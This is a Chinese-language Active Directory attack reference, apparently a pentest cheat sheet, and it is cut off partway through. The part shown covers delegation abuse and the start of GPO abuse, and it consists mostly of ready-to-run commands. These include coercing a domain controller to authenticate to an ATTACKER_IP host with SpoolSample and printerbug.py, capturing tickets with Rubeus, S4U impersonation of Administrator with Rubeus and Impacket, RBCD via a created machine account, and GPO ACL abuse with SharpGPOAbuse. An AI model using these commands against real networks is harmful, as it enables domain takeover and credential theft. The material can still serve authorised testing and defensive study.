advanced-attacks

# 高级 Active Directory 攻击参考 ## 目录 1. [委派攻击](#delegation-attacks) 2. [组策略对象滥用](#group-policy-object-abuse) 3. [RODC 攻击](#rodc-attacks) 4. [SCCM/WSUS 部署](#sccmwsus-deployment) 5. [AD 证书服务 (ADCS)](#ad-certificate-services-adcs) 6. [信任关系攻击](#trust-relationship-attacks) 7. [ADFS Golden SAML](#adfs-golden-saml) 8. [凭据来源](#credential-sources) 9. [Linux AD 集成](#linux-ad-integration) --- ## 委派攻击 ### 无约束委派 (Unconstrained Delegation) 当用户向具有无约束委派的计算机进行身份验证时，其 TGT 会保存到内存中。 **查找委派：** powershell # PowerShell Get-ADComputer -Filter {TrustedForDelegation -eq $True} # BloodHound MATCH (c:Computer {unconstraineddelegation:true}) RETURN c **SpoolService 滥用：** bash # 检查 spooler 服务 ls \dc01pipespoolss # 使用 SpoolSample 触发 .SpoolSample.exe DC01.domain.local HELPDESK.domain.local # 或使用 printerbug.py python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP **使用 Rubeus 监控：** powershell Rubeus.exe monitor /interval:1 ### 约束委派 (Constrained Delegation) **识别：** powershell Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo **使用 Rubeus 利用：** powershell # S4U2 攻击 Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt **使用 Impacket 利用：** bash getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP ### 基于资源的约束委派 (RBCD) powershell # 创建机器账户 New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force) # 设置委派 Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$ # 获取票据 .Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt --- ## 组策略对象 (GPO) 滥用 ### 查找易受攻击的 GPO powershell Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")} ### 使用 SharpGPOAbuse 滥用 powershell # 添加本地管理员 .SharpGPOAbuse.exe --AddLocalAdmin --UserAc